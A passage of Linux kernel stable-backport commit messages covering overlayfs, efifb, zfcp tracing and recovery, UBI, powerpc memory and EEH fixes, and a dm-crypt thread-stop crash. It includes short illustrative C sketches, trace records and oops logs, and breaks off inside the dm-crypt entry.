Be defensive about what underlying fs provides us in the returned xattr
list buffer. strlen() may overrun the buffer, so use strnlen() and WARN if
the contents are not properly null terminated.
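A minimal sketch of the defensive walk, with illustrative names; it is not
the driver's actual code:

  /* Hypothetical sketch: never read past the buffer the lower fs returned */
  static ssize_t check_xattr_list(const char *list, size_t size)
  {
      const char *s;
      size_t len;

      for (s = list; s < list + size; s += len) {
          len = strnlen(s, size - (s - list)) + 1;
          if (WARN_ON(len > size - (s - list)))
              return -EIO;    /* entry was not null terminated */
      }
      return size;
  }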
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6a45b3628c upstream.
The function uses the memory address of a struct dentry as a unique id.
While the address-based directory entry is only visible to root, it is IMHO
still worth fixing since the temporary name does not have to be a kernel
address. It can be any unique number. Replace it by an atomic integer
which is allowed to wrap around.
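A minimal sketch of the wrapping-counter scheme, with hypothetical names:

  /* Hypothetical sketch: a wrapping atomic counter instead of a pointer */
  static atomic_t ovl_temp_id = ATOMIC_INIT(0);

  static void ovl_temp_name(char *name, size_t len)
  {
      /* any unique number will do; nothing kernel-address-shaped leaks */
      snprintf(name, len, "#%x", atomic_inc_return(&ovl_temp_id));
  }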
Signed-off-by: Richard Weinberger <richard@nod.at>
Reviewed-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Fixes: e9be9d5e76 ("overlay filesystem")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d50b3f43db upstream.
When using efifb with a 16-bit (5:6:5) visual, fbcon's text is rendered
in the wrong colors - e.g. text gray (#aaaaaa) is rendered as green
(#50bc50) and neighboring pixels have slightly different values
(such as #50bc78).
The reason is that fbcon loads its 16 color palette through
efifb_setcolreg(), which in turn calculates a 32-bit value to write
into memory for each palette index.
Until now, this code could only handle 8-bit visuals and didn't mask
overlapping values when ORing them.
With this patch, fbcon displays the correct colors when a qemu VM is
booted in 16-bit mode (in GRUB: "set gfxpayload=800x600x16").
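A sketch of the masked per-channel packing the fix implies, written as a
hypothetical helper (efifb's real setcolreg code is organized differently):

  /* Hypothetical sketch: scale and mask each channel before OR'ing */
  static u32 pack_pixel(const struct fb_var_screeninfo *var,
                        u16 red, u16 green, u16 blue)
  {
      u32 mask, val = 0;

      mask = (1 << var->red.length) - 1;
      val |= ((red >> (16 - var->red.length)) & mask) << var->red.offset;
      mask = (1 << var->green.length) - 1;
      val |= ((green >> (16 - var->green.length)) & mask) << var->green.offset;
      mask = (1 << var->blue.length) - 1;
      val |= ((blue >> (16 - var->blue.length)) & mask) << var->blue.offset;

      return val;    /* works for 5:6:5 as well as 8:8:8 visuals */
  }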
Fixes: 7c83172b98 ("x86_64 EFI boot support: EFI frame buffer driver") # v2.6.24+
Signed-off-by: Max Staudt <mstaudt@suse.de>
Acked-By: Peter Jones <pjones@redhat.com>
Signed-off-by: Tomi Valkeinen <tomi.valkeinen@ti.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e7cb08e894 upstream.
We accidentally overwrite the original saved value of "flags" so that we
can't re-enable IRQs at the end of the function. Presumably this
function is mostly called with IRQs disabled or it would be obvious in
testing.
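An illustration of the bug pattern only (the lock names are made up); the
point is that the inner spin_lock_irqsave() must not reuse the outer
call's flags variable:

  static DEFINE_SPINLOCK(outer_lock);
  static DEFINE_SPINLOCK(inner_lock);

  static void flags_reuse_bug(void)
  {
      unsigned long flags;

      spin_lock_irqsave(&outer_lock, flags);      /* saves caller's IRQ state */
      spin_lock_irqsave(&inner_lock, flags);      /* BUG: overwrites it */
      spin_unlock_irqrestore(&inner_lock, flags);
      spin_unlock_irqrestore(&outer_lock, flags); /* restores the wrong state */
  }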
Fixes: aceeffbb59 ("zfcp: trace full payload of all SAN records (req,resp,iels)")
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit aceeffbb59 upstream.
This was lost with commit 2c55b750a8
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
but is necessary for problem determination, e.g. to see the
currently active zone set during automatic port scan.
For the large GPN_FT response (4 pages), save space by not dumping
any empty residual entries.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a8 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Reviewed-by: Alexey Ishchuk <aishchuk@linux.vnet.ibm.com>
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 94db3725f0 upstream.
commit 2c55b750a8
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
started to add FC_CT_HDR_LEN which made zfcp dump random data
out of bounds for RSPN GS responses because u.rspn.rsp
is the largest and last field in the union of struct zfcp_fc_req.
Other request/response types only happened to stay within bounds
due to the padding of the union or
due to the trace capping of u.gspn.rsp to ZFCP_DBF_SAN_MAX_PAYLOAD.
Timestamp : ...
Area : SAN
Subarea : 00
Level : 1
Exception : -
CPU id : ..
Caller : ...
Record id : 2
Tag : fsscth2
Request id : 0x...
Destination ID : 0x00fffffc
Payload short : 01000000 fc020000 80020000 00000000
xxxxxxxx xxxxxxxx xxxxxxxx xxxxxxxx <===
00000000 00000000 00000000 00000000
Payload length : 32 <===
struct zfcp_fc_req {
[0] struct zfcp_fsf_ct_els ct_els;
[56] struct scatterlist sg_req;
[96] struct scatterlist sg_rsp;
union {
struct {req; rsp;} adisc; SIZE: 28+28= 56
struct {req; rsp;} gid_pn; SIZE: 24+20= 44
struct {rspsg; req;} gpn_ft; SIZE: 40*4+20=180
struct {req; rsp;} gspn; SIZE: 20+273= 293
struct {req; rsp;} rspn; SIZE: 277+16= 293
[136] } u;
}
SIZE: 432
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a8 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Reviewed-by: Alexey Ishchuk <aishchuk@linux.vnet.ibm.com>
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 771bf03537 upstream.
With commit 2c55b750a8
("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
we lost the N_Port-ID where an ELS response comes from.
With commit 7c7dc19681
("[SCSI] zfcp: Simplify handling of ct and els requests")
we lost the N_Port-ID where a CT response comes from.
It's especially useful if the request SAN trace record
with D_ID was already lost due to trace buffer wrap.
GS uses an open WKA port handle and ELS just a D_ID, and
only for ELS we could get D_ID from QTCB bottom via zfcp_fsf_req.
To cover both cases, add a new field to zfcp_fsf_ct_els
and fill it in on request to use in SAN response trace.
Strictly speaking the D_ID on SAN response is the FC frame's S_ID.
We don't need a field for the other end which is always us.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 2c55b750a8 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.")
Fixes: 7c7dc19681 ("[SCSI] zfcp: Simplify handling of ct and els requests")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d27a7cb919 upstream.
Since commit a54ca0f62f
("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
HBA records no longer contain WWPN, D_ID, or LUN
to reduce duplicate information which is already in REC records.
In contrast to "regular" target ports, we don't use recovery to open
WKA ports such as directory/nameserver, so we don't get REC records.
Therefore, introduce pseudo REC running records without any
actual recovery action but including D_ID of WKA port on open/close.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: a54ca0f62f ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 35f040df97 upstream.
While retaining the actual filtering according to trace level,
the following commits started to write such filtered records
with a hardcoded record level of 1 instead of the actual record level:
commit 250a1352b9
("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.")
commit a54ca0f62f
("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Now we can distinguish written records again for offline level filtering.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 250a1352b9 ("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.")
Fixes: a54ca0f62f ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4eeaa4f3f1 upstream.
On a successful end of reopen port forced,
zfcp_erp_strategy_followup_success() re-uses the port erp_action
and the subsequent zfcp_erp_action_cleanup() now
sees ZFCP_ERP_SUCCEEDED with
erp_action->action==ZFCP_ERP_ACTION_REOPEN_PORT
instead of ZFCP_ERP_ACTION_REOPEN_PORT_FORCED
but must not perform zfcp_scsi_schedule_rport_register().
We can detect this because the fresh port reopen erp_action
is in its very first step ZFCP_ERP_STEP_UNINITIALIZED.
Otherwise this opens a time window with unblocked rport
(until the followup port reopen recovery would block it again).
If a scsi_cmnd timeout occurs during this time window
fc_timed_out() cannot work as desired and such command
would indeed time out and trigger scsi_eh. This prevents
a clean and timely path failover.
This should not happen if the path issue can be recovered
on FC transport layer such as path issues involving RSCNs.
Also, unnecessary and repeated DID_IMM_RETRY for pending and
undesired new requests occur because internally zfcp still
has its zfcp_port blocked.
As follow-on errors with scsi_eh, it can cause,
in the worst case, permanently lost paths due to one of:
sd <scsidev>: [<scsidisk>] Medium access timeout failure. Offlining disk!
sd <scsidev>: Device offlined - not ready after error recovery
For fix validation and to aid future debugging with other recoveries
we now also trace (un)blocking of rports.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 5767620c38 ("[SCSI] zfcp: Do not unblock rport from REOPEN_PORT_FORCED")
Fixes: a2fa0aede0 ("[SCSI] zfcp: Block FC transport rports early on errors")
Fixes: 5f852be9e1 ("[SCSI] zfcp: Fix deadlock between zfcp ERP and SCSI")
Fixes: 338151e066 ("[SCSI] zfcp: make use of fc_remote_port_delete when target port is unavailable")
Fixes: 3859f6a248 ("[PATCH] zfcp: add rports to enable scsi_add_device to work again")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 70369f8e15 upstream.
In the hardware data router case, introduced with kernel 3.2
commit 86a9668a8d ("[SCSI] zfcp: support for hardware data router")
the ELS/GS request&response length needs to be initialized
as in the chained SBAL case.
Otherwise, the FCP channel rejects ELS requests with
FSF_REQUEST_SIZE_TOO_LARGE.
Such ELS requests can be issued by user space through BSG / HBA API,
or zfcp itself uses ADISC ELS for remote port link test on RSCN.
The latter can cause a short path outage due to
unnecessary remote target port recovery because the always
failing ADISC cannot detect extremely short path interruptions
beyond the local FCP channel.
Below example is decoded with zfcpdbf from s390-tools:
Timestamp : ...
Area : SAN
Subarea : 00
Level : 1
Exception : -
CPU id : ..
Caller : zfcp_dbf_san_req+0408
Record id : 1
Tag : fssels1
Request id : 0x<reqid>
Destination ID : 0x00<target d_id>
Payload info : 52000000 00000000 <our wwpn > [ADISC]
<our wwnn > 00<s_id> 00000000
00000000 00000000 00000000 00000000
Timestamp : ...
Area : HBA
Subarea : 00
Level : 1
Exception : -
CPU id : ..
Caller : zfcp_dbf_hba_fsf_res+0740
Record id : 1
Tag : fs_ferr
Request id : 0x<reqid>
Request status : 0x00000010
FSF cmnd : 0x0000000b [FSF_QTCB_SEND_ELS]
FSF sequence no: 0x...
FSF issued : ...
FSF stat : 0x00000061 [FSF_REQUEST_SIZE_TOO_LARGE]
FSF stat qual : 00000000 00000000 00000000 00000000
Prot stat : 0x00000100
Prot stat qual : 00000000 00000000 00000000 00000000
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 86a9668a8d ("[SCSI] zfcp: support for hardware data router")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bd77befa5b upstream.
For an NPIV-enabled FCP device, zfcp can erroneously show
"NPort (fabric via point-to-point)" instead of "NPIV VPORT"
for the port_type sysfs attribute of the corresponding
fc_host.
s390-tools that can be affected are dbginfo.sh and ziomon.
zfcp_fsf_exchange_config_evaluate() ignores
fsf_qtcb_bottom_config.connection_features indicating NPIV
and only sets fc_host_port_type to FC_PORTTYPE_NPORT if
fsf_qtcb_bottom_config.fc_topology is FSF_TOPO_FABRIC.
Only the independent zfcp_fsf_exchange_port_evaluate()
evaluates connection_features to overwrite fc_host_port_type
to FC_PORTTYPE_NPIV in case of NPIV.
Code was introduced with upstream kernel 2.6.30
commit 0282985da5
("[SCSI] zfcp: Report fc_host_port_type as NPIV").
This works during FCP device recovery (such as set online)
because it performs FSF_QTCB_EXCHANGE_CONFIG_DATA followed by
FSF_QTCB_EXCHANGE_PORT_DATA in sequence.
However, the zfcp-specific scsi host sysfs attributes
"requests", "megabytes", or "seconds_active" trigger only
zfcp_fsf_exchange_config_evaluate() resetting fc_host
port_type to FC_PORTTYPE_NPORT despite NPIV.
The zfcp-specific scsi host sysfs attribute "utilization"
triggers only zfcp_fsf_exchange_port_evaluate() correcting
the fc_host port_type again in case of NPIV.
Evaluate fsf_qtcb_bottom_config.connection_features
in zfcp_fsf_exchange_config_evaluate(), where it belongs.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 0282985da5 ("[SCSI] zfcp: Report fc_host_port_type as NPIV")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2365418879 upstream.
When Fastmap is used we can hit an -EBADMSG here since Fastmap cannot
know about unmaps.
If the erasure was interrupted, the PEB may show ECC errors and UBI would
go into ro-mode, as it assumes that the PEB was checked during attach
time, which is not the case with Fastmap.
Fixes: dbb7d2a88d ("UBI: Add fastmap core")
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 681cc36083 upstream.
Avoid that mapping an sg-list in which the first element has a
non-zero offset triggers an infinite loop when using FMR. This
patch makes the FMR mapping code similar to that of ib_sg_to_pages().
Note: older Mellanox HCAs do not support non-zero offsets for FMR.
See also commit 8c4037b501 ("IB/srp: always avoid non-zero offsets
into an FMR").
Reported-by: Alex Estrin <alex.estrin@intel.com>
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 08bf75ba85 upstream.
In commit 2b4e3ad8f5 ("powerpc/mm/hash64: Don't test for machine type
to detect HEA special case") we changed the logic in might_have_hea()
to check FW_FEATURE_SPLPAR rather than machine_is(pseries).
However the check was incorrectly negated, leading to crashes on
machines with HEA adapters, such as:
mm: Hashing failure ! EA=0xd000080080004040 access=0x800000000000000e current=NetworkManager
trap=0x300 vsid=0x13d349c ssize=1 base psize=2 psize 2 pte=0xc0003cc033e701ae
Unable to handle kernel paging request for data at address 0xd000080080004040
Call Trace:
.ehea_create_cq+0x148/0x340 [ehea] (unreliable)
.ehea_up+0x258/0x1200 [ehea]
.ehea_open+0x44/0x1a0 [ehea]
...
Fix it by removing the negation.
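A greatly simplified sketch of the corrected check (the real helper
contains additional conditions):

  /* Simplified sketch: the SPLPAR test must not be negated */
  static bool might_have_hea_example(void)
  {
      /* broken: return !firmware_has_feature(FW_FEATURE_SPLPAR); */
      return firmware_has_feature(FW_FEATURE_SPLPAR);
  }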
Fixes: 2b4e3ad8f5 ("powerpc/mm/hash64: Don't test for machine type to detect HEA special case")
Reported-by: Denis Kirjanov <kda@linux-powerpc.org>
Reported-by: Jan Stancek <jstancek@redhat.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 05af40e885 upstream.
This commit fixes a stack corruption in the pseries specific code dealing
with the huge pages.
In __pSeries_lpar_hugepage_invalidate() the buffer used to pass arguments
to the hypervisor is not large enough. This leads to a stack corruption
where a previously saved register could be corrupted, leading to an
unexpected result in the caller, like the following panic:
Oops: Kernel access of bad area, sig: 11 [#1]
SMP NR_CPUS=2048 NUMA pSeries
Modules linked in: virtio_balloon ip_tables x_tables autofs4
virtio_blk 8139too virtio_pci virtio_ring 8139cp virtio
CPU: 11 PID: 1916 Comm: mmstress Not tainted 4.8.0 #76
task: c000000005394880 task.stack: c000000005570000
NIP: c00000000027bf6c LR: c00000000027bf64 CTR: 0000000000000000
REGS: c000000005573820 TRAP: 0300 Not tainted (4.8.0)
MSR: 8000000000009033 <SF,EE,ME,IR,DR,RI,LE> CR: 84822884 XER: 20000000
CFAR: c00000000010a924 DAR: 420000000014e5e0 DSISR: 40000000 SOFTE: 1
GPR00: c00000000027bf64 c000000005573aa0 c000000000e02800 c000000004447964
GPR04: c00000000404de18 c000000004d38810 00000000042100f5 00000000f5002104
GPR08: e0000000f5002104 0000000000000001 042100f5000000e0 00000000042100f5
GPR12: 0000000000002200 c00000000fe02c00 c00000000404de18 0000000000000000
GPR16: c1ffffffffffe7ff 00003fff62000000 420000000014e5e0 00003fff63000000
GPR20: 0008000000000000 c0000000f7014800 0405e600000000e0 0000000000010000
GPR24: c000000004d38810 c000000004447c10 c00000000404de18 c000000004447964
GPR28: c000000005573b10 c000000004d38810 00003fff62000000 420000000014e5e0
NIP [c00000000027bf6c] zap_huge_pmd+0x4c/0x470
LR [c00000000027bf64] zap_huge_pmd+0x44/0x470
Call Trace:
[c000000005573aa0] [c00000000027bf64] zap_huge_pmd+0x44/0x470 (unreliable)
[c000000005573af0] [c00000000022bbd8] unmap_page_range+0xcf8/0xed0
[c000000005573c30] [c00000000022c2d4] unmap_vmas+0x84/0x120
[c000000005573c80] [c000000000235448] unmap_region+0xd8/0x1b0
[c000000005573d80] [c0000000002378f0] do_munmap+0x2d0/0x4c0
[c000000005573df0] [c000000000237be4] SyS_munmap+0x64/0xb0
[c000000005573e30] [c000000000009560] system_call+0x38/0x108
Instruction dump:
fbe1fff8 fb81ffe0 7c7f1b78 7ca32b78 7cbd2b78 f8010010 7c9a2378 f821ffb1
7cde3378 4bfffea9 7c7b1b79 41820298 <e87f0000> 48000130 7fa5eb78 7fc4f378
Most of the time, the bug surfaces in a caller further up the stack from
__pSeries_lpar_hugepage_invalidate(), which is quite confusing.
This bug has been present since v3.11 but was hidden if a caller of the
caller of __pSeries_lpar_hugepage_invalidate() had pushed the corrupted
register (r18 in this case) onto the stack and did not use it until
restoring it. GCC 6.2.0 seems to trigger it more frequently.
This commit also changes the definition of the parameter buffer in
pSeries_lpar_flush_hash_range() to rely on the global define
PLPAR_HCALL9_BUFSIZE (no functional change here).
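A minimal sketch of sizing the buffer with the global define; the function
body is illustrative, not the driver's actual code:

  /* plpar_hcall9() writes nine values back into its buffer, so the local
   * array must have PLPAR_HCALL9_BUFSIZE entries */
  static void bulk_remove_example(void)
  {
      unsigned long param[PLPAR_HCALL9_BUFSIZE];
      long rc;

      rc = plpar_hcall9(H_BULK_REMOVE, param, 0, 0, 0, 0, 0, 0, 0, 0, 0);
      (void)rc;
  }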
Fixes: 1a5272866f ("powerpc: Optimize hugepage invalidate")
Signed-off-by: Laurent Dufour <ldufour@linux.vnet.ibm.com>
Reviewed-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Acked-by: Balbir Singh <bsingharora@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1a34439e5a upstream.
Debugging a data corruption issue with virtio-net/vhost-net led to
the observation that __copy_tofrom_user was occasionally returning
a value 16 larger than it should. Since the return value from
__copy_tofrom_user is the number of bytes not copied, this means
that __copy_tofrom_user can occasionally return a value larger
than the number of bytes it was asked to copy. In turn this can
cause higher-level copy functions such as copy_page_to_iter_iovec
to corrupt memory by copying data into the wrong memory locations.
It turns out that the failing case involves a fault on the store
at label 79, and at that point the first unmodified byte of the
destination is at R3 + 16. Consequently the exception handler
for that store needs to add 16 to R3 before using it to work out
how many bytes were not copied, but in this one case it was not
adding the offset to R3. To fix it, this moves the label 179 to
the point where we add 16 to R3. I have checked manually all the
exception handlers for the loads and stores in this code and the
rest of them are correct (it would be excellent to have an
automated test of all the exception cases).
This bug has been present since this code was initially
committed in May 2002 to Linux version 2.5.20.
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d5a1e42cb4 upstream.
For hugetlb to work with 4K page size, we need MAX_ORDER to be 13 or
more. When switching from a 64K page size to 4K linux page size using
make oldconfig, we end up with a CONFIG_FORCE_MAX_ZONEORDER value of 9.
This results in a 16M hugepage being considered as a gigantic huge page
which in turn results in failure to setup hugepages if gigantic hugepage
support is not enabled.
This also results in a kernel crash with the 4K radix configuration. We
hit the below BUG_ON on radix:
kernel BUG at mm/huge_memory.c:364!
Oops: Exception in kernel mode, sig: 5 [#1]
SMP NR_CPUS=2048 NUMA PowerNV
CPU: 0 PID: 1 Comm: swapper/0 Not tainted 4.8.0-rc1-00006-gbae9cc6 #1
task: c0000000f1af8000 task.stack: c0000000f1aec000
NIP: c000000000c5fa0c LR: c000000000c5f9d8 CTR: c000000000c5f9a4
REGS: c0000000f1aef920 TRAP: 0700 Not tainted (4.8.0-rc1-00006-gbae9cc6)
MSR: 9000000102029033 <SF,HV,VEC,EE,ME,IR,DR,RI,LE,TM[E]> CR: 24000844 XER: 00000000
CFAR: c000000000c5f9e0 SOFTE: 1
....
NIP [c000000000c5fa0c] hugepage_init+0x68/0x238
LR [c000000000c5f9d8] hugepage_init+0x34/0x238
Fixes: a7ee539584 ("powerpc/Kconfig: Update config option based on page size")
Reported-by: Santhosh <santhog4@linux.vnet.ibm.com>
Signed-off-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Acked-by: Balbir Singh <bsingharora@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a7032132d7 upstream.
The hub diag-data type is filled with big-endian data by OPAL call
opal_pci_get_hub_diag_data(). We need convert it to CPU-endian value
before using it. The issue is reported by sparse as pointed by Michael
Ellerman:
eeh-powernv.c:1309:21: warning: restricted __be16 degrades to integer
This converts hub diag-data type to CPU-endian before using it in
pnv_eeh_get_and_dump_hub_diag().
Fixes: 2a485ad7c8 ("powerpc/powernv: Drop PHB operation next_error()")
Suggested-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Russell Currey <ruscur@russell.cc>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 04fec21c06 upstream.
eeh_pe_bus_get() can return NULL if a PCI bus isn't found for a given PE.
Some callers don't check this, and can cause a null pointer dereference
under certain circumstances.
Fix this by checking NULL everywhere eeh_pe_bus_get() is called.
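A sketch of the NULL check added at each call site (the surrounding
function is hypothetical):

  static void eeh_handle_pe_example(struct eeh_pe *pe)
  {
      struct pci_bus *bus = eeh_pe_bus_get(pe);

      if (!bus) {
          pr_err("%s: Cannot find PCI bus for PHB#%d-PE#%x\n",
                 __func__, pe->phb->global_number, pe->addr);
          return;
      }

      /* safe to dereference bus from here on */
  }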
Fixes: 8a6b1bc70d ("powerpc/eeh: EEH core to handle special event")
Signed-off-by: Russell Currey <ruscur@russell.cc>
Reviewed-by: Andrew Donnellan <andrew.donnellan@au1.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d63e51b31e upstream.
The PE number (@frozen_pe_no), filled by opal_pci_next_error() is in
big-endian format. It should be converted to CPU-endian before it is
passed to opal_pci_eeh_freeze_clear() when clearing the frozen state if
the PE is invalid one. As Michael Ellerman pointed out, the issue is
also detected by sparse:
eeh-powernv.c:1541:41: warning: incorrect type in argument 2 (different base types)
This passes CPU-endian PE number to opal_pci_eeh_freeze_clear() and it
should be part of commit <0f36db77643b> ("powerpc/eeh: Fix wrong printed
PE number"), which was merged to 4.3 kernel.
Fixes: 71b540adff ("powerpc/powernv: Don't escalate non-existing frozen PE")
Suggested-by: Paul Mackerras <paulus@samba.org>
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Russell Currey <ruscur@russell.cc>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5045ea3737 upstream.
__kernel_get_syscall_map() and __kernel_clock_getres() use cmpli to
check if the passed in pointer is non zero. cmpli maps to a 32 bit
compare on binutils, so we ignore the top 32 bits.
A simple test case can be created by passing in a bogus pointer with
the bottom 32 bits clear. Using a clk_id that is handled by the VDSO,
then one that is handled by the kernel shows the problem:
printf("%d\n", clock_getres(CLOCK_REALTIME, (void *)0x100000000));
printf("%d\n", clock_getres(CLOCK_BOOTTIME, (void *)0x100000000));
And we get:
0
-1
The bigger issue is if we pass a valid pointer with the bottom 32 bits
clear, in this case we will return success but won't write any data
to the pointer.
I stumbled across this issue because the LLVM integrated assembler
doesn't accept cmpli with 3 arguments. Fix this by converting them to
cmpldi.
Fixes: a7f290dad3 ("[PATCH] powerpc: Merge vdso's and add vdso support to 32 bits kernel")
Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b42d9023a3 upstream.
In commit 31cdd0c39c ("powerpc/xmon: Fix SPR read/write commands and
add command to dump SPRs") I added two uses of the "ld" instruction in
spr_access.S. "ld" is a 64-bit instruction, so shouldn't be used on
32-bit CPUs.
Replace it with PPC_LL which is a macro that gives us either "ld" or
"lwz" depending on whether we're 64 or 32-bit.
Fixes: 31cdd0c39c ("powerpc/xmon: Fix SPR read/write commands and add command to dump SPRs")
Reported-by: John Paul Adrian Glaubitz <glaubitz@physik.fu-berlin.de>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f659b10087 upstream.
As the documentation for kthread_stop() says, "if threadfn() may call
do_exit() itself, the caller must ensure task_struct can't go away".
dm-crypt does not ensure this and therefore crashes when crypt_dtr()
calls kthread_stop(). The crash is trivially reproducible by adding a
delay before the call to kthread_stop() and just opening and closing a
dm-crypt device.
general protection fault: 0000 [#1] PREEMPT SMP
CPU: 0 PID: 533 Comm: cryptsetup Not tainted 4.8.0-rc7+ #7
task: ffff88003bd0df40 task.stack: ffff8800375b4000
RIP: 0010: kthread_stop+0x52/0x300
Call Trace:
crypt_dtr+0x77/0x120
dm_table_destroy+0x6f/0x120
__dm_destroy+0x130/0x250
dm_destroy+0x13/0x20
dev_remove+0xe6/0x120
? dev_suspend+0x250/0x250
ctl_ioctl+0x1fc/0x530
? __lock_acquire+0x24f/0x1b10
dm_ctl_ioctl+0x13/0x20
do_vfs_ioctl+0x91/0x6a0
? ____fput+0xe/0x10
? entry_SYSCALL_64_fastpath+0x5/0xbd
? trace_hardirqs_on_caller+0x151/0x1e0
SyS_ioctl+0x41/0x70
entry_SYSCALL_64_fastpath+0x1f/0xbd
This problem was introduced by bcbd94ff48 ("dm crypt: fix a possible
hang due to race condition on exit").
Looking at the description of that patch (excerpted below), it seems
like the problem it addresses can be solved by just using
set_current_state instead of __set_current_state, since we obviously
need the memory barrier.
| dm crypt: fix a possible hang due to race condition on exit
|
| A kernel thread executes __set_current_state(TASK_INTERRUPTIBLE),
| __add_wait_queue, spin_unlock_irq and then tests kthread_should_stop().
| It is possible that the processor reorders memory accesses so that
| kthread_should_stop() is executed before __set_current_state(). If
| such reordering happens, there is a possible race on thread
| termination: [...]
So this patch just reverts the aforementioned patch and changes the
__set_current_state(TASK_INTERRUPTIBLE) to set_current_state(...). This
fixes the crash and should also fix the potential hang.
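A simplified sketch of the ordering that matters in the writer thread:

  static int write_thread_example(void *data)
  {
      while (1) {
          /* set_current_state() implies the barrier that keeps the
           * kthread_should_stop() test from being reordered before it */
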